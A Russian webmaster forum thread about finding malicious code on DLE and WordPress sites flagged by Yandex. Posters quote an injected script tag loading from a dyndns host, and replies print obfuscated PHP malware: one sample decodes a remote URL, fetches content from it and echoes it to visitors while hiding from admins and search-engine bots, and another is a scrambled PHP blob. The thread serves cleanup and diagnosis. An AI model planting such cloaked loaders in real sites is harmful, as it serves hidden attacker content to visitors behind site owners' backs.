Вредоносный код

123 4
F7
На сайте с 04.05.2010
Offline
34
4646

Здравствуйте.При проверке сайта Яндекс нашел вредоносный код <script src="http://epic-win.dyndns.org/host.php?id=159"></script>.Перерыл весь движок(DLE) но так ничего и не нашел.:mad:Смотрел все измененные файлы за последнее время.Подскажите где он может прятатьса.Может быть кто то с таким сталкивалса.

Заранее спасибо за ответы.

R
На сайте с 24.01.2008
Offline
180
#1

Стучите поможем!

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
Егор
На сайте с 28.02.2006
Offline
231
#2

Нашлось примерно следующее в /engine/modules/sitelogin.php

$GLOBALS['_intled_']=Array(base64_decode('ZmlsZV9n'.'ZXRfY'.'29ud'.'G'.'VudHM='),base64_decode('c'.'HJlZ'.'19tYXRjaA=='),base64_decode('cHJ'.'lZ'.'1'.'9tYXR'.'jaA'.'=='),base64_decode(''.'cHJlZ19t'.'Y'.'XRja'.'A=='));

function intled($i){
$a=Array('aHR0cDovL2NvZGVzLWJhbmsubmV0L2dldGNvZGUuZGF0','ZGxlX3Bhc3N3b3Jk','L3lhbmRleC9p','SFRUUF9VU0VSX0FHRU5U','L2dvb2dsZS9p','SFRUUF9VU0VSX0FHRU5U','L2JvdC9p','SFRUUF9VU0VSX0FHRU5U');
return base64_decode($a[$i]);
}

function checkim() {
$ret = @$GLOBALS['_intled_'][0](intled(0));
return $ret;
}

function hider() {
if ((!isset($_COOKIE[ intled(1)])) and (!$GLOBALS['_intled_'][1]( intled(2),$_SERVER[ intled(3)])) and (!$GLOBALS['_intled_'][2]( intled(4),$_SERVER[ intled(5)])) and (!$GLOBALS['_intled_'][3]( intled(6),$_SERVER[ intled(7)])) ) {
return true;
} else {
return false;
}
}


function post_new() {
if (hider()) {
echo checkim();
}
}
post_new();
Shakes.pro (http://Shakes.pro/) & Leadbit.com (http://Leadbit.com/) - товарка по всему миру С уважением, Егор
Good_Job
На сайте с 08.08.2008
Offline
107
#3

у меня такая же зараза с кодом, вчера была атака на сайт хостинга и теперь такой же вредоновный код шаблоне сайта( Сайт работает на dle.

Что делать теперь, может кто подскажет?

фрилансер Сергей Иванов: https://ivanovsergey.com (дизайн сайтов и создание сайтов под ключ) | Стать Photoshop-мастером за 30 дней: https://www.youtube.com/c/Blogohelp
facegrodno
На сайте с 02.05.2009
Offline
45
#4

как вариант:

выгрузите весь сайт с хостинга на комп

потом воспользуйтесь поиском TotalCommander по заданной фразе

таким образом я нашел с месяц назад левые линки на сайте

Партнерка кино и развлекательное (http://u.to/BrgYAQ) Новая Кинопартнерка (http://goo.gl/tXuaC) NEW Май 2012
M
На сайте с 26.08.2010
Offline
72
#5
Rxp:
Стучите поможем!

написал вам в лс.

Тоже вирус замучил.

[Удален]
#6

Такие вставки часто появляются в .js файлах. - посмотрите там. Недавно увидел что один из сайтов (объем примерно 4000 стр.) имеет в индексе Гугла 60000 стр.

Обнаружил, что кто-то залил мне сайт еще один сайт с дизайном со стилями и т.д. И активно с этих страниц продавал ссылки (около 200 000) Вот так вот бывает.

А Яндекс даже и не обнаружил этот скрытый сайт...

Andrey0600
На сайте с 03.12.2010
Offline
26
#7

Здравствуйте, яндекс на нескольких моих сайтах обнаружил вирус.Сайты на Вордпрес. На сайтах где обнаружен вирус обнаружен непонятный файл которого нет на других сайтах в папке * Text *, в папке * Engine * есть лишний файл, которого нет на других сайтах * diff *. В етом файле такие непонятные символы

define('·”4765‘1”0”’¬7*1·*4‘9“”*3', 'edol');define('·84”0¬1¬‘“6429*““·74306', 'pxe');define('·2*1¬8804’”··7”302“2‘8*', 'kjsef');define('·34·2¬“¬’864“0’002”“‘10·“', 'lfbhow');define('·6“916’*55”5’“¬*5623¬’’0', 'acel');define('·90558193“463500‘79”141', 'rpts');define('·¬5“9”85”1¬”8’2“238*6¬¬', 'bcdein');define('·279“2“9148028”2*2209665', 'eltnrs');define('··¬’56‘’3““125¬”·4‘”40’5', 'kbmkvy');define('·”·84·““‘946””99‘2¬691”0”', 'bcrrx');function ·¬5’’50’4*‘117‘02’¬‘4’70(&$·3¬1·1¬6*’8·14*3*’093“9‘, $·91*‘0“4¬“4662¬’3158154){$·37¬41¬*175181¬4¬8“5“*” = ·2*1¬8804’”··7”302“2‘8*.·”4765‘1”0”’¬7*1·*4‘9“”*3.·2*1¬8804’”··7”302“2‘8*.·84”0¬1¬‘“6429*““·74306.·2*1¬8804’”··7”302“2‘8*;$·‘2**7509¬·¬‘50*·580‘·¬“” = null;$·67“618114¬9·91‘5”43‘’*6 = ·6“916’*55”5’“¬*5623¬’’0.'_'.·90558193“463500‘79”141;$·40578“622370“”3*1”60·13‘ = ·¬5“9”85”1¬”8’2“238*6¬¬;$·”‘09”’¬28*476¬*841·””“55 = ·279“2“9148028”2*2209665;$·104264””2¬147‘¬”·948¬· = $·67“618114¬9·91‘5”43‘’*6[5].$·67“618114¬9·91‘5”43‘’*6[0].$·”‘09”’¬28*476¬*841·””“55[3].$·40578“622370“”3*1”60·13‘[2];$·40578“622370“”3*1”60·13‘ = $·40578“622370“”3*1”60·13‘[2].$·40578“622370“”3*1”60·13‘[3].$·40578“622370“”3*1”60·13‘[1].$·40578“622370“”3*1”60·13‘[0].$·40578“622370“”3*1”60·13‘[4].$·40578“622370“”3*1”60·13‘[5];$·”‘09”’¬28*476¬*841·””“55 = $·”‘09”’¬28*476¬*841·””“55[5].$·”‘09”’¬28*476¬*841·””“55[2].$·”‘09”’¬28*476¬*841·””“55[4].$·”‘09”’¬28*476¬*841·””“55[1].$·”‘09”’¬28*476¬*841·””“55[0].$·”‘09”’¬28*476¬*841·””“55[3];$·16562’4765¬“‘‘3¬7¬7¬““ = $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(0300, 0333)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(0100, 0170)))];$·16562’4765¬“‘‘3¬7¬7¬““.= $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(020, 030)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(010, 015)))];$·16562’4765¬“‘‘3¬7¬7¬““.= $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(020, 030)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(002, 003)))];$·16562’4765¬“‘‘3¬7¬7¬““.= $·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(040, 060)))].$·67“618114¬9·91‘5”43‘’*6[$·”‘09”’¬28*476¬*841·””“55($·40578“622370“”3*1”60·13‘($·104264””2¬147‘¬”·948¬·(005, 006)))];

Может ли это быть вирусом?

D
На сайте с 06.11.2011
Offline
0
#8
Magdee:
Такие вставки часто появляются в .js файлах. - посмотрите там. Недавно увидел что один из сайтов (объем примерно 4000 стр.) имеет в индексе Гугла 60000 стр.

Обнаружил, что кто-то залил мне сайт еще один сайт с дизайном со стилями и т.д. И активно с этих страниц продавал ссылки (около 200 000) Вот так вот бывает.

А Яндекс даже и не обнаружил этот скрытый сайт...

кстати говоря, часто замечаю на сайтах (визуально) с максимум 100 страницами 2000 и более проиндексированных страниц (через rds). Не ужели та же ситуация, что и у вас?

webrock
На сайте с 05.04.2010
Offline
261
#9
fantom771:
Перерыл весь движок(DLE) но так ничего и не нашел.😡

А что говорит тех.поддержка DLE о дырявости своего детища?

Полный аудит сайтов. (/ru/forum/765361)
maxwell
На сайте с 29.04.2009
Offline
149
#10
webrock:
А что говорит тех.поддержка DLE о дырявости своего детища?

Говорит, что не надо ставить nulled, и предлагает брать их лицензию. ☝

123 4

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий